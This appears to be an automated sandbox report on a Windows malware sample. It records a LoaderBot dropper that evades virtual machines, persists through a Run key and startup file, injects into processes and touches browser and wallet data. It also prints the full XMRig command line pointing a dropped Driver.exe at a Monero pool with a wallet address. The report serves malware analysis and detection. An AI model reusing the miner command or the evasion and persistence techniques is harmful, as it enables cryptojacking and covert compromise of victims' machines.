Analysis
-
max time kernel
87s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
22-10-2023 12:51
Static task
static1
Behavioral task
behavioral1
Sample
b1f7d94305e0f729964239a69bffe320.exe
Resource
win7-20231020-en
General
-
Target
b1f7d94305e0f729964239a69bffe320.exe
-
Size
501KB
-
MD5
b1f7d94305e0f729964239a69bffe320
-
SHA1
2fb02ffda0ce1fc5d719b9b79f2cdc2a0ead863a
-
SHA256
99bba4b98096259772dc0c12f0ebb3b3ff275f4babf75caa380e94e3dbed90c9
-
SHA512
3d6089b7b0f430020bb3a21e21aedbff81c28e8e97bb44c8b0fd6af1ea4bf6356a34b9bdf56bcdf51533dab48fa6446b825e1dbaa8ed38b380222f81bca03a45
-
SSDEEP
12288:VFTTWyVmRw8r6+y3QqBZAnYanJ252Wjx1ZP2BJ4iP:VFxVn8m+y3QqBZ6RK11Zw4q
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ sacubpvoqssabvrgemg.exe -
LoaderBot executable 1 IoCs
resource yara_rule behavioral2/memory/1700-15-0x0000000000AC0000-0x00000000014F4000-memory.dmp loaderbot -
XMRig Miner payload 14 IoCs
resource yara_rule behavioral2/memory/2612-39-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2612-40-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2612-41-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2612-42-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2612-47-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2612-52-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2612-53-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2612-54-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2572-61-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2572-62-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2572-63-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2572-68-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2572-73-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2572-74-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sacubpvoqssabvrgemg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sacubpvoqssabvrgemg.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation sacubpvoqssabvrgemg.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url sacubpvoqssabvrgemg.exe -
Executes dropped EXE 2 IoCs
pid Process 1700 sacubpvoqssabvrgemg.exe 2612 Driver.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0008000000022e36-2.dat themida behavioral2/files/0x0008000000022e36-3.dat themida behavioral2/memory/1700-15-0x0000000000AC0000-0x00000000014F4000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\sacubpvoqssabvrgemg.exe" sacubpvoqssabvrgemg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sacubpvoqssabvrgemg.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1700 sacubpvoqssabvrgemg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 3240 b1f7d94305e0f729964239a69bffe320.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe 1700 sacubpvoqssabvrgemg.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 652 Process not Found -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1700 sacubpvoqssabvrgemg.exe Token: SeLockMemoryPrivilege 2612 Driver.exe Token: SeLockMemoryPrivilege 2612 Driver.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 3240 wrote to memory of 1700 3240 b1f7d94305e0f729964239a69bffe320.exe 90 PID 3240 wrote to memory of 1700 3240 b1f7d94305e0f729964239a69bffe320.exe 90 PID 3240 wrote to memory of 1700 3240 b1f7d94305e0f729964239a69bffe320.exe 90 PID 1700 wrote to memory of 2612 1700 sacubpvoqssabvrgemg.exe 93 PID 1700 wrote to memory of 2612 1700 sacubpvoqssabvrgemg.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\b1f7d94305e0f729964239a69bffe320.exe"C:\Users\Admin\AppData\Local\Temp\b1f7d94305e0f729964239a69bffe320.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3240 -
C:\Users\Admin\AppData\Local\Temp\sacubpvoqssabvrgemg.exe"C:\Users\Admin\AppData\Local\Temp\sacubpvoqssabvrgemg.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 42K92y1uNN7PxEp57QZPiLQogD8pGGRjWQnqEemCTsXMSnqrhagsVujaeBc38hqrX88YL8Wh9pNQHRzTN7GBw8SqQkGBwg7 -p x -k -v=0 --donate-level=1 -t 43⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 42K92y1uNN7PxEp57QZPiLQogD8pGGRjWQnqEemCTsXMSnqrhagsVujaeBc38hqrX88YL8Wh9pNQHRzTN7GBw8SqQkGBwg7 -p x -k -v=0 --donate-level=1 -t 43⤵PID:2572
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.4MB
MD565af1033a01110ec64468bacbe3a7607
SHA19d1f8c17ce63803245c02a0e679ccde3fafcd48a
SHA2562531116b30534eb043a27f83fb4abdec24d212cf58673c117850256510f21264
SHA5129cd3932957dbf748793b9529e1f051532503c4cdef81f67cf86679b8415b92f90fbcae6f2473fb6c125de570dca0e501d11fca37ce4a9b8f554c8e22db322e54
-
Filesize
3.4MB
MD565af1033a01110ec64468bacbe3a7607
SHA19d1f8c17ce63803245c02a0e679ccde3fafcd48a
SHA2562531116b30534eb043a27f83fb4abdec24d212cf58673c117850256510f21264
SHA5129cd3932957dbf748793b9529e1f051532503c4cdef81f67cf86679b8415b92f90fbcae6f2473fb6c125de570dca0e501d11fca37ce4a9b8f554c8e22db322e54
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322